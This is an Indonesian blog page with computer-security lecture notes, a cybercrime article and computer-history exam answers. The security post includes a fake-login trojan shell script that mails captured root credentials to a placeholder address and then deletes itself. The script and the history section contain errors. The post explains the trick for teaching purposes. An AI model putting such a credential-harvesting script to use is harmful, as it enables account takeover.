Pages

Kamis, 10 Januari 2013

Keamanan Komputer


Keamanan Komputer

Keamanan Komputer Mengapa dibutuhkan ?
 “information-based society”, menyebabkan nilai informasi menjadi sangat penting dan menuntut kemampuan untuk mengakses dan menyediakan informasi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi,
 Infrastruktur Jaringan komputer, seperti LAN dan Internet, memungkinkan untuk menyediakan informasi secara cepat, sekaligus membuka potensi adanya lubang keamanan (security hole)

Kejahatan Komputer semakin meningkat karena :
 Aplikasi bisnis berbasis TI dan jaringan komputer meningkat : online banking, ecommerce, Electronic data Interchange (EDI).
 Desentralisasi server.
 Transisi dari single vendor ke multi vendor.
 Meningkatnya kemampuan pemakai (user).
 Kesulitan penegak hokum dan belum adanya ketentuan yang pasti.
 Semakin kompleksnya system yang digunakan, semakin besarnya source code program yang digunakan.
 Berhubungan dengan internet.

Klasifikasi kejahatan Komputer :
Menurut David Icove [John D. Howard, “An Analysis Of Security Incidents On The Internet 1989 - 1995,” PhD thesis, Engineering and Public Policy, Carnegie Mellon University, 1997.] berdasarkan lubang keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu:
1. Keamanan yang bersifat fisik (physical security): termasuk akses orang ke gedung, peralatan, dan media yang digunakan. Contoh :
 Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini.
 Denial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diuta-makan adalah banyaknya jumlah pesan).
 Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan sehingga dia menjadi ter-lalu sibuk dan bahkan dapat berakibat macetnya sistem (hang).
2. Keamanan yang berhubungan dengan orang (personel), Contoh :
 Identifikasi user (username dan password)
 Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola).
3. Keamanan dari data dan media serta teknik komunikasi (communications).
4. Keamanan dalam operasi: Adanya prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga ter-masuk prosedur setelah serangan (post attack recovery). Level annoying Level Dangerous

ASPEK KEAMANAN KOMPUTER :

Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privacy,” O’Reilly & Associ-ates, Inc., 1995. ]
Privacy / Confidentiality
 Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.
 Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator.
Karakteristik Penyusup :
1. The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki.
2. The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali pulih.
3. The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya.
4. The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya.
Istilah bagi penyusup :
1. Mundane ; tahu mengenai hacking tapi tidak mengetahui metode dan prosesnya.
2. lamer (script kiddies) ; mencoba script2 yang pernah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya.
3. wannabe ; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION.
4. larva (newbie) ; hacker pemula, teknik hacking mulai dikuasai dengan baik, sering bereksperimen.
5. hacker ; aktivitas hacking sebagai profesi.
6. wizard ; hacker yang membuat komunitas pembelajaran di antara mereka.
7. guru ; master of the master hacker, lebih mengarah ke penciptaan tools-tools yang powerfull yang salah
satunya dapat menunjang aktivitas hacking, namun lebih jadi tools pemrograman system yang umum.

 Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut.
 Contoh : data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.
 Bentuk Serangan : usaha penyadapan (dengan program sniffer).
 Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan confidentiality adalah dengan menggunakan teknologi kriptografi.

Integrity
 Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
 Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju.
 Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.

Authentication
 Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud.
 Dukungan :
 Adanya Tools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking(untuk menjaga “intellectual property”, yaitu dengan menandai dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan digital signature.
 Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.

Availability
 Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.
 Contoh hambatan :
 “denial of service attack” (DoS attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash.
 mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan mengakses e-mailnya.

Access Control
 Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah
 authentication dan juga privacy
 Metode : menggunakan kombinasi userid/password atau dengan
 menggunakan mekanisme lain.

Non-repudiation
 Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah
melakukan sebuah transaksi. Dukungan bagi electronic commerce.

SECURITY ATTACK MODELS

Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice Hall, 1995.] serangan (attack) terdiri dari :
 Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.
 Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).
 Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
 Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.

SECURITY BREACH ACCIDENT

1996 U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau
adanya usaha untuk membobol sistem keamanan 1996 FBI National Computer Crimes Squad, Washington D.C., memperkirakan kejahatan komputer yang terdeteksi kurang dari 15%, dan hanya 10% dari angka itu yang dilaporkan 1997 Penelitian Deloitte Touch Tohmatsu menunjukkan bahwa dari 300 perusahaan di Australia, 37% (dua diantara lima) pernah mengalami masalah keamanan sistem komputernya. 
1996 Inggris, NCC Information Security Breaches Survey menunjukkan bahwa kejahatan komputer menaik 200% dari tahun 1995 ke 1996. Kerugian rata-rata US $30.000 / insiden.
1998 FBI melaporkan bahwa kasus persidangan yang berhubungan dengan kejahatan komputer meroket 950% dari tahun 1996 ke tahun 1997, dengan penangkapan dari 4 ke 42, dan terbukti (convicted) di pengadilan naik 88% dari 16 ke 30 kasus. Dan lain-lain. Dapat dilihat di www.cert.org
Contoh akibat dari jebolnya sistem keamanan, antara lain:
1988 Keamanan sistem mail sendmail dieksploitasi oleh Robert Tapan Morris sehingga melumpuhkan sistem Internet. Kegiatan ini dapat diklasifikasikan sebagai “denial of service attack”.
Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morris dihukum (convicted) dan hanya didenda $10.000. (10 Maret 1997)
Seorang hacker dari Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport local (Worcester, Massachusetts) sehingga mematikan komunikasi di control tower dan menghalau pesawat yang hendak mendarat. Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.
1990 Kevin Poulsen mengambil alih system komputer telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local.
1995 Kevin Mitnick, mencuri 20.000 nomor kartu kredit, menyalin system operasi DEC secara illegal dan mengambil alih hubungan telpon di New York dan California.
1995 Vladimir Levin membobol bank-bank di kawasan Wallstreet, mengambil uang sebesar $10 juta.
2000 Fabian Clone menjebol situs aetna.co.id dan Jakarta mail dan membuat directory atas namanya berisi peringatan terhadap administrator situs tersebut.
2000 Beberapa web site Indonesia sudah dijebol dan daftarnya (beserta contoh halaman yang sudah dijebol) dapat dilihat di koleksi <http://www.2600.com>
2000 Wenas, membuat server sebuah ISP di singapura down

MEMAHAMI HACKER BEKERJA

Secara umum melalui tahapan-tahapan sebagai berikut :
1. Tahap mencari tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap penjelajahan
4. Tahap keluar dan menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obokobok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya. Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul
pesan
Login:root
Password: ********
Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu 
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

PRINSIP DASAR PERANCANGAN SISTEM YANG AMAN

1. Mencegah hilangnya data
2. Mencegah masuknya penyusup

LAPISAN KEAMANAN :

1. Lapisan Fisik :
 membatasi akses fisik ke mesin :
o Akses masuk ke ruangan komputer
o penguncian komputer secara hardware
o keamanan BIOS
o keamanan Bootloader
 back-up data :
o pemilihan piranti back-up
o penjadwalan back-up
 mendeteksi gangguan fisik :
 log file : Log pendek atau tidak lengkap, Log yang berisikan waktu yang aneh, Log dengan permisi atau kepemilikan yang tidak tepat, Catatan pelayanan reboot atau restart, Log yang hilang, masukan su atau login dari tempat yang janggal
 mengontrol akses sumber daya.
2. Keamanan lokal Berkaitan dengan user dan hak-haknya :
 Beri mereka fasilitas minimal yang diperlukan.
 Hati-hati terhadap saat/dari mana mereka login, atau tempat seharusnya mereka login.
 Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.
3. Keamanan Root
 Ketika melakukan perintah yang kompleks, cobalah dalam cara yang tidak merusak dulu, terutama perintah yang menggunakan globbing: contoh, anda ingin melakukan "rm foo*.bak", pertama coba dulu: "ls foo*.bak" dan pastikan anda ingin menghapus file-file yang anda pikirkan.
 Beberapa orang merasa terbantu ketika melakukan "touch /-i" pada sistem mereka. Hal ini akan membuat  perintah-perintah seperti : "rm -fr *" menanyakan apakah anda benar-benar ingin menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan memberlakukannya sebagai option -i ke rm).
 Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika anda berusaha mengetahui bagaimana melakukan sesuatu, kembali ke shell pemakai normal hingga anda yakin apa yang perlu dilakukan oleh root.
 Jalur perintah untuk pemakai root sangat penting. Jalur perintah, atau variabel lingkungan PATH mendefinisikan lokal yang dicari shell untuk program. Cobalah dan batasi jalur perintah bagi pemakai root sedapat mungkin, dan jangan pernah menggunakan '.', yang berarti 'direktori saat ini', dalam pernyataan PATH anda. Sebagai tambahan, jangan pernah menaruh direktori yang dapat ditulis pada jalur pencarian anda, karena hal ini memungkinkan penyerang memodifikasi atau menaruh file biner dalam jalur pencarian anda, yang memungkinkan mereka menjadi root ketika anda menjalankan perintah tersebut.
 Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec (disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak serangan, dan sangat berbahaya bila dijalankan sebagai root. Jangan membuat file .rhosts untuk root.
 File /etc/securetty berisikan daftar terminal-terminal tempat root dapat login. Secara baku (pada RedHat Linux) diset hanya pada konsol virtual lokal (vty). Berhati-hatilah saat menambahkan yang lain ke file ini. Anda seharusnya login dari jarak jauh sebagai pemakai biasa dan kemudian 'su' jika anda butuh (mudahmudahan melalui ssh atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara langsung sebagai root.
 Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan anda dapat mempengaruhi banyak hal. Pikir sebelum anda mengetik!
4. Keamanan File dan system file
 Directory home user tidak boleh mengakses perintah mengubah system seperti partisi, perubahan device dan lain-lain.
 Lakukan setting limit system file.
 Atur akses dan permission file : read, writa, execute bagi user maupun group.
 Selalu cek program-program yang tidak dikenal
5. Keamanan Password dan Enkripsi
 Hati-hati terhadap bruto force attack dengan membuat password yang baik.
 Selalu mengenkripsi file yang dipertukarkan.
 Lakukan pengamanan pada level tampilan, seperti screen saver.
6. Keamanan Kernel
 selalu update kernel system operasi.
 Ikuti review bugs dan kekurang-kekurangan pada system operasi.
7. Keamanan Jaringan
 Waspadai paket sniffer yang sering menyadap port Ethernet.
 Lakukan prosedur untuk mengecek integritas data
 Verifikasi informasi DNS
 Lindungi network file system
 Gunakan firewall untuk barrier antara jaringan privat dengan jaringan eksternal

Daftar Pustaka
Referensi Mata Kuliah Keamanan Komputer
http://www.Goole.com
http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv

Senin, 10 Desember 2012

Artikel Tentang Cyber Crime

CyberCrime with Violence


      Kejahatan Cyber ( Cybercrime) adalah sebuah kejahatan yang dilakukan dengan menggunakan computer dan bertekhnologi internet sebagai sarana/ alat sebagai objek atau subjek dan dilakukan dengan sengaja. Cybercrime with violence adalah sebuah perbuatan melawan hukum dengan menggunakan computer berbasis jaringan dan tekhnologi internet yang menjadikan jaringan tersebut menjadi subjek/objek dari kegiatan terorisme, kejahatan cyber pornografi anak, kejahatan cyber dengan ancaman ataupun kejahatan cyber penguntitan.

    Secara harfiah, kejahatan cyber yang menjadikan korban dengan menggunakan kekerasan secara langsung memang tidak bisa dilihat hubungan timbal baliknya, namun ada implikasi dari kejahatan-kejahatan tersebut, yang berupa ancaman terhadap rasa aman dan keselamatan korban kejahatan.

     Dr. Dorothy Dennings, (Bernadette Hlubik Schell, Clemens Martin, Cybercrime: A Reference Handbook, ABC-CLIO,2004) salah satu pakar cybercrime di Universitas Goergetown Amerika mengatakan bahwa “jaringan internet telah menjadi lahan yang subur untuk melakukan serangan – serangan terhadap pemerintah, perusahaan-perusahaan dan individu-individu. Para pelaku kejahatan ini melakukan pembobolan data, penyadapan dan penguntitan individu/personal yang mengakibatkan terancamnya keselamatan individu, merusak jaringan website yang mengakibatkan hancurnya data base yang sudah dibangun, ada dua faktor yang sangat penting untuk menentukan apakah korban dari cyber terorisme ini dapat menjadi ancaman yang mengakibatkan terlukai atau terbunuhnya banyak orang. Faktor yang pertama apakah ada target yang dapat dibuktikan bahwa kejahatan ini dapat menuntun dilakukannya kekerasan dan penganiayaan. Faktor yang kedua adalah apakah ada actor yang mempunyai kapabilitas ( kemampuan) dan motivasi untuk dilakukannya cyber terorisme”.

     Dari keterangan diatas, maka dapat dibedakan antara hacker yang memiliki alat, pengetahuan dan alat dengan tindakan cyber terorisme. Mereka para Hacker pada umunya tidak memiliki motivasi kapabilitas untuk melakukan kekerasan yang mengakibatkan tingkat kerusakan yang tinggi di jaringan internet. Untuk kejahatan terorisme dengan motivasi keagamaan, kekerasan terinspirasi sebagai tindakan yang baik, ekstrimis keagaamaan menjadi tertarik terhadap target yang lebih luas dan tidak membeda-bedakan target kekerasan akibat dari perspektif yang terbentuk dengan bantuan alat / tekhnologi internet. Mereka menjadikan isu dengan tendensi agar seluruh penganut keagamaan yang tidak sealiran dengan mereka menjadi target. Isu-isu sosial itulah yang disebarluaskan melalui jaringan cyber sehingga menjadikan target kekerasan yang dapat mematikan kepada semua orang diluar sana. Banyak orang sekarang menjadi terancam keselamatan fisiknya baik dilakukan melalui pesan maupun kampanye kebencian yang menyesatkan karena cyberterorisme.

     Pemerintah USA telah mendefinisikan Cyberterorisme sebagai perbuatan terorisme yang dilakukan, direncanakan dan dikoordinasikan dalam jaringan cyberspace, yang melalui jaringan computer. Faktor-faktor yang menjadikan menjadi pertimbangan untuk mencegah Cyber crime sebagai prioritas utama adalah (Debra Littlejohn Shinder, Ed Tittel, Scene of the Cybercrime: Computer Forensics Handbook, Syngress, 2002):

     Perluasan target kekerasan : Cybercrime yang melibatkan kekerasan atau potensi kekerasan melawan orang ( khususnya terhadap anak-anak) adalah normal sebagai prioritas utama, kejahatan terhadap property yang mengakibatkan kerugian yang bernilai besar juga menjadi focus perhatian yang lebih besar untuk ditanggulangi dari pada dengan nilai kerugian yang kecil.

     Frekwensi Kejadian : Cybercrime yang terjadi lebih sering menjadi focus perhatian utama dari pada yang jarang terjadi.

    Kemampuan Personel : penyidikan cybercrime yang dapat dilakukan oleh satu penyidik lebih membantu satuannya karena tidak banyak penyidik yang dimiliki untuk melakukan penyidikan cybercrime.

    Pelatihan Personel : membeda-bedakan kasus cybercrime dan bukan kadangkala tergantung penyidik yang sudah dilatih atau belom.

     Jurisdiksi : Kesatuan secara umum lebih menitik beratkan kepada kasus yang menimpa masyarakat local. Walaupun mempunyai kewenangan secara hukum, banyak kesatuan tidak mengeluarkan dana dan sumber dayanya untuk menangani kejahatan cyber melewati batas jurisdiksinya.

   Tingkat Kesulitan Penyidikan: Tingkat kesulitan pengungkapannya dan tingkat kesuskesan dari hasil penyidikan dapat menjadikan kasus cybercrime mana yang menjadi prioritas.

    Faktor Politik : Pengungkapan seringkali dipengaruhi pengaruh suasana politis yang menjadikan kasus cyber sebagai prioritas utama.

Senin, 26 November 2012

Jawaban UTS MK " Pengenalan Ilmu Komputer "


1. SEJARAH PERKEMBANGAN KOMPUTER

     Berdasarkan perkembangan teknologi komputer, maka perkembangannya dapat kita bagi menjadi 2 bagian yaitu :
• Sebelum tahun 1940.
• Setelah tahun 1940.
     Sejak dahulu kala, proses pengolahan data telah dilakukan oleh manusia. Manusia juga menemukan alat-alat mekanik dan elektronik untuk membantu manusia dalam penghitungan dan pengolahan data supaya bisa mendapatkan hasil lebih cepat. Komputer yang kita temui saat ini adalah suatu evolusi panjang dari penemuanpenemuan manusia sejah dahulu kala berupa alat mekanik maupun elektronik. Saat ini komputer dan piranti pendukungnya telah masuk dalam setiap aspek kehidupan dan pekerjaan. Komputer yang ada sekarang memiliki kemampuan yang lebih dari sekedar perhitungan matematik biasa. Diantaranya adalah sistem komputer di kassa supermarket yang mampu membaca kode barang belanjaan, sentral telepon yang menangani jutaan panggilan dan komunikasi, jaringan komputer dan internet yang menghubungkan berbagai tempat di dunia. Bagaimanapun juga alat pengolah data dari sejak jaman purba sampai saat ini bisa kita golongkan ke dalam 4 golongan besar. Peralatan manual: yaitu peralatan pengolahan data yang sangat sederhana, dan faktor terpenting dalam pemakaian alat adalah menggunakan tenaga tangan manusia.
     Peralatan Mekanik: yaitu peralatan yang sudah berbentuk mekanik yang digerakkan dengan tangan secara manual.
• Peralatan Mekanik Elektronik: Peralatan mekanik yang digerakkan oleh secara otomatis oleh motor elektronik
• Peralatan Elektronik: Peralatan yang bekerjanya secara elektronik penuh.

      Beberapa peralatan yang telah digunakan sebagai alat hitung sebelum ditemukannya komputer :

• Abacus. Muncul sekitar 5000 tahun yang lalu di Asia kecil dan masih digunakan di beberapa tempat hingga saat ini, dapat dianggap sebagai awal mula mesin komputasi. Alat ini memungkinkan penggunanya untuk melakukan perhitungan menggunakan biji-bijian geser yang diatur pada sebuah rak. Para pedagang di masa itu menggunakan abacus untuk menghitung transaksi perdagangan. Seiring dengan munculnya pensil dan kertas, terutama di Eropa, Abacus kehilangan popularitasnya.

• Kalkulator roda numerik. Setelah hampir 12 abad, muncul penemuan lain dalam hal mesin komputasi. Pada tahun 1642, Blaise Pascal (1623-1662), yang pada waktu itu berumur 18 tahun, menemukan apa yang ia sebut sebagai kalkulator roda numerik(numerical wheel calculator) untuk membantu ayahnya melakukan perhitungan pajak. Kotak persegi kuningan ini yang dinamakan Pascaline, menggunakan delapan roda putar bergerigi untuk menjumlahkan bilangan hingga delapan digit. Alat ini merupakan alat penghitung bilangan berbasis sepuluh. Kelemahan alat ini adalah hanya terbataas untuk melakukan penjumlahan.

• Kalkulator roda numerik 2. Tahun 1694, seorang matematikawan dan filsuf Jerman, Gottfred Wilhem von Leibniz (1646-1716) memperbaiki Pascaline dengan membuat mesin yang dapat mengalikan. Sama seperti pendahulunya, alat mekanik ini bekerja dengan menggunakan roda-roda gerigi. Dengan mempelajari catatan dan gambar-gambar yang dibuat oleh Pascal, Leibniz dapat menyempurnakan alatnya.

• Kalkulator Mekanik. Charles Xavier Thomas de Colmar menemukan mesin yang dapat melakukan empat fungsi aritmatik dasar. Kalkulator mekanik Colmar, arithometer, mempresentasikan pendekatan yang lebih praktis dalam kalkulasi karena alat tersebut dapat melakukan penjumlahan, pengurangan, perkalian, dan pembagian. Dengan kemampuannya, arithometer banyak dipergunakan hingga masa Perang Dunia I. Bersama-sama dengan Pascal dan Leibniz, Colmar membantu membangun era komputasi mekanikal. Awal mula komputer yang sebenarnya dibentuk oleh seorang profesor matematika Inggris, Charles Babbage (1791-1871). Tahun 1812, Babbage memperhatikan kesesuaian alam antara mesin mekanik dan matematika:mesin mekanik sangat baik dalam mengerjakan tugas yang sama berulangkali tanpa kesalahan, sedang matematika membutuhkan repetisi sederhana dari suatu langkah-langkah tertentu. Masalah tersebut kemudain berkembang hingga menempatkan mesin mekanik sebagai alat untuk menjawab kebutuhan mekanik. Usaha Babbage yang pertama untuk menjawab masalah ini muncul pada tahun 1822 ketika ia mengusulkan suatu mesin untuk melakukan perhitungan persamaan differensil. Mesin tersebut dinamakan Mesin Differensial. Dengan menggunakan tenaga uap, mesin tersebut dapat menyimpan program dan dapat melakukan kalkulasi serta mencetak hasilnya secara otomatis. Setelah bekerja dengan Mesin Differensial selama sepuluh tahun, Babbage tibatiba terinspirasi untuk memulai membuat komputer general-purpose yang pertama, yang disebut Analytical Engine. Asisten Babbage, Augusta Ada King (1815-1842) memiliki peran penting dalam pembuatan mesin ini. Ia membantu merevisi rencana, mencari pendanaan dari pemerintah Inggris, dan mengkomunikasikan spesifikasi Anlytical Engine kepada publik. Selain itu, pemahaman Augusta yang baik tentang mesin ini memungkinkannya membuat instruksi untuk dimasukkan ke dlam mesin dan juga membuatnya menjadi programmer wanita yang pertama. Pada tahun 1980, Departemen Pertahanan Amerika Serikat menamakan sebuah bahasa pemrograman dengan nama ADA sebagai penghormatan kepadanya. Pada 1889, Herman Hollerith (1860-1929) juga menerapkan prinsip kartu perforasi untuk melakukan penghitungan. Tugas pertamanya adalah menemukan cara yang lebih cepat untuk melakukan perhitungan bagi Biro Sensus Amerika Serikat. Sensus sebelumnya yang dilakukan di tahun 1880 membutuhkan waktu tujuh tahun untuk menyelesaikan perhitungan. Dengan berkembangnya populasi, Biro tersebut memperkirakan bahwa dibutuhkan waktu sepuluh tahun untuk menyelesaikan perhitungan sensus.Pada masa berikutnya, beberapa insinyur membuat p enemuan baru lainnya. Vannevar Bush(1890-1974) membuat sebuah kalkulator untuk menyelesaikan persamaan differensial di tahun 1931. Mesin tersebut dapat menyelesaikan persamaan differensial kompleks yang selama ini dianggap rumit oleh kalangan akademisi. Mesin tersebut sangat besar dan berat karena ratusan gerigi dan poros yang dibutuhkan untuk melakukan perhitungan. Pada tahun 1903, John V. Atanasoff dan Clifford Berry mencoba membuat komputer elektrik yang menerapkan aljabar Boolean pada sirkuit elektrik. Pendekatan ini didasarkan pada hasil kerja George Boole (1815-1864) berupa sistem biner aljabar, yang menyatakan bahwa setiap persamaan matematik dapat dinyatakan sebagai benar atau salah. Dengan mengaplikasikan kondisi benar-salah ke dalam sirkuit listrik dalam bentuk terhubungterputus, Atanasoff dan Berry membuat komputer elektrik pertama di tahun 1940. Namun proyek mereka terhenti karena kehilangan sumber pendanaan.

Setelah tahun 1940
Perkembangan komputer setelah tahun 1940 dibagi lagi menjadi 5 generasi.
 
Komputer generasi pertama ( 1940 - 1959 ).
     Komputer generasi pertama ini menggunakan tabung vakum untuk memproses dan menyimpan data. Ia menjadi cepat panas dan mudah terbakar, oleh karena itu beribu-ribu tabung vakum diperlukan untuk menjalankan operasi keseluruhan komputer. Ia juga memerlukan banyak tenaga elektrik yang menyebabkan gangguan elektrik di kawasan sekitarnya. Komputer generasi pertama ini 100% elektronik dan membantu para ahli dalam menyelesaikan masalah perhitungan dengan cepat dan tepat. Beberapa komputer generasi pertama :
• ENIAC (Electronic Numerical Integrator And Calculator ) dirancang oleh Dr John Mauchly dan Presper Eckert pada tahun 1946. Komputer generasi ini sudah mulai menyimpan data yang dikenal sebagai konsep penyimpanan data (stored program concept) yang dikemukakan oleh John Von Neuman.

• KOMPUTER EDVAC Penggunaan tabung vakum juga telah dikurangi di dalam perancangan komputer EDVAC (Electronic Discrete Variable Automatic Computer) di mana proses perhitungan menjadi lebih cepat dibandingkan ENIAC.

• EDSAC COMPUTER EDSAC (Electonic Delay Storage Automatic Calculator) memperkenalkan penggunaan raksa (merkuri) dalam tabung untuk menyimpan data. UNIVAC 1 Computer. Pada tahun 1951 Dr Mauchly dan Eckert menciptakan UNIVAC 1 (Universal Automatic Calculator ) komputer pertama yang digunakan untuk memproses data perdagangan

Komputer generasi kedua ( 1959 - 1964 )
